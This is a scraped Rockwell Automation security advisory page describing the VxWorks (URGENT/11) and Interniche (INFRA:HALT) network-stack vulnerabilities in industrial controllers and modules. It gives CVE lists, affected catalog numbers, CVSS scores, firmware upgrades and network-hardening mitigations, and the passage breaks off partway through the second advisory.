Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

Additional Links

Critical
PN1494 | VxWorks Vulnerabilities affect Programmable Automation Controllers, EtherNet/IP Communication Modules, I/O Modules, Kinetix 6500 Servo Drive, High-Frequency RFID Interface Block
Published Date:
August 11, 2021
Last Updated:
October 04, 2024
CVE IDs:
CVE-2019-12260, CVE-2019-12265, CVE-2019-12257, CVE-2019-12258, CVE-2019-12256, CVE-2019-12255, CVE-2019-12263, CVE-2019-12262, CVE-2019-12264, CVE-2019-12261, CVE-2019-12259
Products:
Network Address Translation (NAT) Device, 5069 Compact I/O, 1732E ArmorBlock I/O, Ethernet/IP Connected Products, High-Frequency RFID, 1756 ControlLogix I/O
CVSS Scores (v3.1):
9.8, 8.8, 7.5, 8.1, 6.3, 7.1, 5.4
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

 

Revision History
Revision Number
1.0
Revision History 
October 1, 2024 – Version 1.6 Updated Affected Catalog Numbers and Suggested Actions for ControlLogix EtherNet/IP Module
02-March-2020 - Version 1.4. Updated suggested risk mitigation & user actions.
11-November-2020 - Version 1.3. Corrected suggested actions.
16-November-2019 - Version 1.2. Updated Advisory.
30-July-2019 - Version 1.0. Initial Release.
Revision History
Revision Number
1.1
Revision History

09-October-2019 - Updated Advisory

On October 1st, 2019, it was reported (ICS-CERT Advisory: ICSA-19-274-01) that the series of TCP/IP stack vulnerabilities originally reported as impacting VxWorks systems were now found to impact additional real-time operating system vendors including ENEA, Green Hills Software, ITRON, and IP Infusion. Rockwell Automation is not aware of any products affected by the new advisory. An investigation is ongoing and this advisory will be updated when the investigation is complete.

 

Revision History
Revision Number
1.2
Revision History

16-November-2019 - Updated Advisory

Rockwell Automation completed an investigation into the additional, impacted real-time operating systems reported in ICS-CERT Advisory: ICSA-19-274-0, and concluded that no products are affected by this new advisory.

Revision History
Revision Number
1.3
Revision History
2-November-2020. Corrected suggested actions.

The Rockwell Automation PSIRT has updated the suggested actions for the for the ControlLogix 5580 and CompactLogix. Please refer to the Risk Mitigation & User Action section below for more information.

Revision History
Revision Number
1.4
Revision History
02-March-2020 - Version 1.4. Updated suggested risk mitigation & user actions.

The Rockwell Automation PSIRT has updated the suggested actions for the for the ControlLogix 5580, GuardLogix 5580, CompactLogix 5380, and CompactLogix 5380. Please refer to the Risk Mitigation & User Action section below for more information.

Revision History
Revision Number
1.5
Revision History
04-August-2021 – Version 1.5 Updated firmware available for 1747-AENTR and 1769-AENTR
 
Revision History 

1.6

October 1, 2024 – Updated Affected Catalog Numbers and Suggested Actions for ControlLogix EtherNet/IP Module

Executive Summary

Armis, an Internet of Things (IoT) security firm, reported a total of eleven vulnerabilities to WindRiver that affect VxWorks, a real-time operating system (RTOS) utilized by many different technology vendors, including Rockwell Automation™. These vulnerabilities, if successfully exploited, may result in several impacts ranging from packet information disclosure to allowing a threat actor to execute arbitrary code on the targeted device.

Not every VxWorks vulnerability applies to every impacted product family. Please see the table under Affected Products for a full list of the potentially affected Rockwell Automation products and the corresponding VxWorks vulnerabilities, which are identified by their Common Vulnerabilities and Exposures (CVE) ID.

Currently, Rockwell Automation is working to address these vulnerabilities and will continue to provide updates as these fixes become available. Please subscribe to updates to this advisory and the Industrial Security Advisory Index (Knowledgebase ID 54102) to stay notified.

Customers using potentially affected products are encouraged to evaluate their own systems and apply the appropriate mitigations from those listed below. Additional details relating to the discovered vulnerabilities and recommended countermeasures, are provided herein.

Affected Products


 

 

Product Family

 

 

 

 

Catalogs

 

 

 

 

CVE-2019-12255

 

 

 

 

CVE-2019-12256

 

 

 

 

CVE-2019-12257

 

 

 

 

CVE-2019-12258

 

 

 

 

CVE-2019-12259

 

 

 

 

CVE-2019-12260

 

 

 

 

CVE-2019-12261

 

 

 

 

CVE-2019-12262

 

 

 

 

CVE-2019-12263

 

 

 

 

CVE-2019-12264

 

 

 

 

CVE-2019-12265

 

 

 

 

CompactLogix™ 5480 (EPIC controller)

 

 

 

 

5069-L4

 

 

 

 

 

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

Compact 5000™ I/O EtherNet/IP Adapter

 

 

 

 

5069-AEN2TR

 

 

 

 

 

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

ControlLogix® 5580 (+ GuardLogix®)

 

 

 

 

1756-L8

 

 

 

 

 

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

CompactLogix Compact GuardLogix 5380

 

 

 

 

5069-L3 
5069-L3S2

 

 

 

 

 

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

CompactLogix 5370

 

 

 

 

1769-L3

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

CompactLogix GuardLogix 5370

 

 

 

 

1769-L3S

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

CompactLogix 5370

 

 

 

 

1769-L2

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

CompactLogix 5370

 

 

 

 

1769-L1

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

ControlLogix EtherNet/IP Module

 

 

 

 

1756-EN2TSC/A

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

ControlLogix EtherNet/IP Module

 

 

 

 

1756-EN2TSC/B

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

ControlLogix EtherNet/IP Module

 

 

 

 

1756-EN2T/C

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

ControlLogix EtherNet/IP Module

 

 

 

 

1756-EN2T/D

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

ControlLogix EtherNet/IP Module

 

 

 

 

1756-EN4TR

 

 

 

 

 

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

ControlLogix EtherNet/IP Module

 

 

 

 

1756-EN2TP/A

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

ControlLogix EtherNet/IP Module

 

 

 

 

1756-EN2TR/B

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

ControlLogix EtherNet/IP Module

 

 

 

 

1756-EN2TR/C

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

ControlLogix EtherNet/IP Module

 

 

 

 

1756-EN3TR/A

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ControlLogix EtherNet/IP Module

 

 

 

 

1756-EN3TR/B

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

X

 

 

 

 

ControlLogix EtherNet/IP Module

 

 

 

 

1756-EN2F/B

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ControlLogix EtherNet/IP Module

 

 

 

 

1756-EN2F/C

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

ControlLogix EtherNet/IP Module

 

 

 

 

1756-EN2TRXT

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

1783-NATR, Network Address Translation Router

 

 

 

 

1783-NATR

 

 

 

 

 

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

ArmorBlock® I/O Modules

 

 

 

 

1732E-8CFGM8R

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

ArmorBlock I/O Modules

 

 

 

 

1732E-IB8M8SOER

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

ArmorBlock I/O Modules

 

 

 

 

1732E-IF4M12R

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

ArmorBlock I/O Modules

 

 

 

 

1732E-IR4M12R

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

ArmorBlock I/O Modules

 

 

 

 

1732E-IT4M12R

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

ArmorBlock I/O Modules

 

 

 

 

1732E-OB8M8SR

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

ArmorBlock I/O Modules

 

 

 

 

1732E-OF4M12R

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

ArmorBlock I/O Modules

 

 

 

 

1732E-8IOLM12R

 

 

 

 

 

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

Bulletin 56RF High-Frequency RFID

 

 

 

 

56RF-IN-IPD22

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

Bulletin 56RF High-Frequency RFID

 

 

 

 

56RF-IN-IPD22A

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

Bulletin 56RF High-Frequency RFID

 

 

 

 

56RF-IN-IPS12

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

SLC™ 500 EtherNet/IP Adapter

 

 

 

 

1747-AENTR

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

CompactLogix E/IP Adapter

 

 

 

 

1769-AENTR

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

Kinetix® 6200 Servo Multi-axis Drives

 

 

 

 

2094-SE02F-M00-Sx

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

Kinetix® 6500 Servo Multi-axis Drives

 

 

 

 

2094-EN02D-M01-Sx

 

 

 

 

x

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 

 

 

x

 

 
 

Vulnerability Details

Vulnerability #1: TCP Urgent Pointer = 0 leads to integer underflow
A remote, unauthenticated threat actor could either hijack an existing TCP session or establish a new TCP session to inject malformed TCP packets to the device, resulting in a denial of service condition to the application, or could allow the execution of arbitrary code on the affected device. Products implementing non-executable memory mitigations reduce the risk of exploitation.

CVE-2019-12255 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned.

Vulnerability #2: Stack overflow in the parsing of IPv4 packets’ IP options
A remote, unauthenticated threat actor could send invalid IPv4 packets, resulting in a crash to the task that receives or transmits any Ethernet packets, or could allow the execution of arbitrary code on the affected device.

CVE-2019-12256 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned.

Vulnerability #3: Heap overflow in DHCP Offer/ACK parsing inside ipdhcpc
A remote, unauthenticated threat actor could utilize this vulnerability overwrite the heap, which may result in a crash later on when a task requests memory from the heap.

CVE-2019-12257 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been assigned.

Vulnerability #4: Denial of Service (DoS) of TCP connection via malformed TCP options
A remote, unauthenticated threat actor who is able to figure out the source and destination TCP port and IP addresses of a session could potentially inject invalid TCP segments which cause the TCP session to be reset, resulting in a crash of the application that is reading from the affected socket.

CVE-2019-12258 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been assigned.

Vulnerability #5: DoS via NULL dereference in IGMP parsing
An unauthenticated threat actor on the same Local Area Network (LAN) as the victim system may use this vulnerability to cause a Denial of Service condition to the task that receives and transmits Ethernet packets.

CVE-2019-12259 has been assigned to this vulnerability. A CVSS v3 base score of 6.3 has been assigned.

Vulnerability #6: TCP Urgent Pointer state confusion caused by malformed TCP AO option
A threat actor could utilize this vulnerability to cause a buffer overflow and result in a crash the application that reads from the affected TCP socket, or could potentially allow the execution of arbitrary code on the affected device.

CVE-2019-12260 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned.

Vulnerability #7: TCP Urgent Pointer state confusion during connect() to a remote host
A threat actor could utilize this vulnerability to cause a buffer overflow and result in a crash the application that reads from the affected TCP socket, or could potentially allow the execution of arbitrary code on the affected device.

CVE-2019-12261 has been assigned to this vulnerability. Rockwell Automation evaluated the vulnerability using the Common Vulnerability Scoring System (“CVSS”) v3.0. A CVSS v3 base score of 8.8 has been assigned.

Vulnerability #8: Handling of unsolicited Reverse Address Resolution Protocol (ARP) replies
A threat actor on the same LAN as the victim system can send reverse-ARP responses to the victim system and assign IPv4 addresses to the target, which could potentially result in network connectivity issues if any of the ARP values collide.

CVE-2019-12262 has been assigned to this vulnerability. A CVSS v3 base score of 7.1 has been assigned.

Vulnerability #9: TCP Urgent Pointer state confusion due to race condition
A threat actor could utilize this vulnerability to cause a buffer overflow and result in a crash the application that reads from the affected TCP socket, or could potentially allow the execution of arbitrary code on the affected device.

CVE-2019-12263 has been assigned to this vulnerability. A CVSS v3 base score of 8.1 has been assigned.

Vulnerability #10: Logical flaw in IPv4 assignment by the ipdhcpc DHCP client
A threat actor on the same LAN as the victim system could hijack a DHCP client session which may result in the victim incorrectly assigning a multicast IP address that originated from the threat actor.

CVE-2019-12264 has been assigned to this vulnerability. A CVSS v3 base score of 7.1 has been assigned.

Vulnerability #11: IGMP information leak via IGMPv3 specific membership report
This vulnerability may allow a threat actor on the same LAN as the victim system to transmit packets to the network that may contain information from packets that were previously sent/received by the network stack.

CVE-2019-12265 has been assigned to this vulnerability. A CVSS v3 base score of 5.4 has been assigned.

Risk Mitigation & User Action

Customers using affected products are encouraged evaluate their risk and when possible, combine the following risk mitigation strategies provided below with the general security guidelines.

  1. Ensure all devices are placed behind an external firewall and add a rule to drop or block any TCP segment where the “URG-flag” is set.
  2. Take the suggested actions for the products in the table below:
Product Catalog Numbers Suggested Actions

 

 

CompactLogix™ 5480 (EPIC Controller) 

 

 

 

 

5069-L4 

 

 

 

 

Upgrade to firmware version 32.013 (Download) or later. 

 

 

 

 

Compact 5000™ I/O EtherNet/IP Adapter 

 

 

 

 

5069-AEN2TR 

 

 

 

 

Will not be patched. Suggested action is to migrate to the 5069-AENTR. 

 

 

 

 

ControlLogix EtherNet/IP Module 

 

 

 

 

1756-EN2TSC/A 
1756-EN2TSC/B 

 

 

 

 

Will not be patched as it has been discontinued. 

 

 

 

 

ControlLogix EtherNet/IP Module 

 

 

 

 

1756-EN2T/D 
1756-EN2TP/A 
 
1756-EN2TR/C 
1756-EN2F/C 
1756-EN4TR 

 

 

1756-EN3TR/B 

 

 

 

 

Upgrade to firmware version 11.002 (Download) or later. 
(1756-EN4TR only) Upgrade to firmware version 3.001 (Download) or later. 

 

 

 

 

ControlLogix EtherNet/IP Module 

 

 

 

 

 

 

 

1756-EN2T/C 

 

 

1756-EN2F/B 

 

 

1756-EN2TR/B 

 

 

1756-EN3TR/A 

 

 

 

 

 

 

 

 

 

 

 No fix . Upgrade to 1756-EN2T/D, 1756-EN2TP/A, 1756-EN2TR/C, 1756-EN2F/C 
1756-EN4TR, or 1756-EN3TR/B  

 

 

 

 

ControlLogix 5580 

 

 

 

 

1756-L8 

 

 

 

 

Upgrade to firmware version 30.015 (Download) or version 31.013 (Download) or version 32.013 (Download) or later. 

 

 

 

 

GuardLogix 5580 

 

 

 

 

1756-L8S 

 

 

 

 

Upgrade to firmware version 31.013 (Download) or version 32.013 (Download) or later. 

 

 

 

 

CompactLogix 5380 

 

 

 

 

5069-L3 

 

 

 

 

Upgrade to firmware version 30.015 (Download) version 31.013 (Download) or version 32.013 (Download) or later. 

 

 

 

 

Compact GuardLogix 5380 

 

 

 

 

5069-L3S2 

 

 

 

 

Upgrade to firmware version 31.013 (Download) or version 32.013 (Download) or later. 

 

 

 

 

CompactLogix 5370 

 

 

 

 

1769-L3 
1769-L2 
1769-L1 

 

 

 

 

Upgrade to firmware version 32.013 (Download) or later. 

 

 

 

 

CompactLogix GuardLogix 5370 

 

 

 

 

1769-L3S 

 

 

 

 

Upgrade to firmware version 28.015 (Download) or version 32.013 (Download) or later. 

 

 

 

 

1783-NATR, Network Address Translation Route 

 

 

 

 

1783-NATR 

 

 

 

 

Upgrade to firmware version 1.005 (Download) or later. 

 

 

 

 

Kinetix® 6200 Servo Multi-axis Drives 

 

 

 

 

2094-SE02F-M00-Sx 

 

 

 

 

Upgrade to firmware version 1.050 (Download) or later. 

 

 

 

 

Kinetix® 6500 Servo Multi-axis Drives 

 

 

 

 

2094-EN02D-M01-Sx 

 

 

 

 

Upgrade to firmware version 3.005 (Download) or later. 

 

 

 

 

SLC 500 EtherNet/IP Adapter 

 

 

 

 

1747-AENTR 

 

 

 

 

Upgrade to firmware version 2.003 (Download) or later. 

 

 

 

 

CompactLogix E/IP Adapter 

 

 

 

 

1769-AENTR 

 

 

 

 

Upgrade to firmware version 1.002 (Download) or later. 

 

 

General Security Guidelines

  • Block all traffic to EtherNet/IP or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222, Port# 44818, Port #80, and Port #161 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation products, see Knowledgebase Article ID 898270.
  • Use trusted software, software patches, anti-virus/anti-malware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID 494865.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Please recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (secure@ra.rockwell.com). Please direct all media inquiries to Kolve Byrd (kabyrd@ra.rockwell.com).

ADDITIONAL LINKS

 

High
PN1575 | PN1575 | Interniche Vulnerabilities present in Rockwell Automation Products – “INFRA:HALT”
Published Date:
August 09, 2021
Last Updated:
August 09, 2021
CVE IDs:
CVE-2020-25767, CVE-2020-35684, CVE-2020-35685, CVE-2021-31400, CVE-2021-36762, CVE-2020-25926, CVE-2021-31226, CVE-2021-31401, CVE-2021-31228, CVE-2020-25928, CVE-2020-25927, CVE-2021-31227, CVE-2020-27565, CVE-2020-35683
Products:
AADvance, 1715 Distributed I/O, 1715 Redundant I/O, ArmorStart
CVSS Scores:
8.2, 4.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 – August 9, 2021

Executive Summary

Rockwell Automation received a report from CERT/CC with research done by Forescout Technologies and Vdoo regarding fourteen vulnerabilities in the products listed below. If successfully exploited, these vulnerabilities may result in the products faulting and/or ceasing communications, requiring the power to be cycled to the product to recover.

Customers using affected versions of these products are encouraged to evaluate the following mitigations provided below and apply them to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided below.

Affected Products

20-COMM-ER All Versions
ArmorStart 28xE All Versions
1715-AENTR All Versions
AADvance Safety Controller All Versions
AADvance Eurocard Controllers All Versions

Vulnerability Details

CVE-2020-25767: Malformed DNS Response could cause a device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to form a malformed response to a DNS request, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H


CVE-2020-25928: Malformed DNS Response could cause a device to fault due to a heap overflow.

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed DNS response, which would result in a heap-buffer overflow resulting in a possible information leak, remote code execution, or the device to fault and/or cease communications requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 9.8/10 [CRITICAL]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


CVE-2020-25927: Malformed DNS Response could cause a device to fault.

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed DNS response, which would result in an Out-of-Bounds read resulting in a device fault and/or cessation of communications requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 8.2/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H


CVE-2020-25926: Insufficiently randomized transaction IDs could facilitate DNS cache poisoning attacks

A REMOTE, UNAUTHENTICATED attacker may be able to poison the DNS cache of the device due to transaction IDs not being properly randomized.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 4.0/10 [MEDIUM]
Researcher CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N


CVE-2020-27565: Malformed HTTP request could cause a device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed HTTP request, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-35683: Malformed ICMP packet could cause a device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed ICMP packet, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H


CVE-2020-35684: Malformed ICMP packet could cause a device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed ICMP packet, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H


CVE-2020-35685: TCP connections may be hikjacked due to an insufficiently random source

A REMOTE, UNAUTHENTICATED attacker may be able to hijack a TCP connection and spoof the device’s network connections.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N


CVE-2021-31400: Malformed TCP segment could cause device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed TCP segment, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding the vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N


CVE-2021-31401: Malformed TCP header could cause device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed TCP header, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding the vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N


CVE-2021-31226: Malformed HTTP POST request could cause device to fault or bypass authentication

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed HTTP Post request, which would result in the device faulting and/or ceasing communications and requiring a power cycle, or possibly bypassing an authentication attempt.
See the links at the end of the article to obtain more technical information regarding the vulnerability.

Researcher CVSS v3.1 Base Score: 9.1/10 [CRITICAL]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H


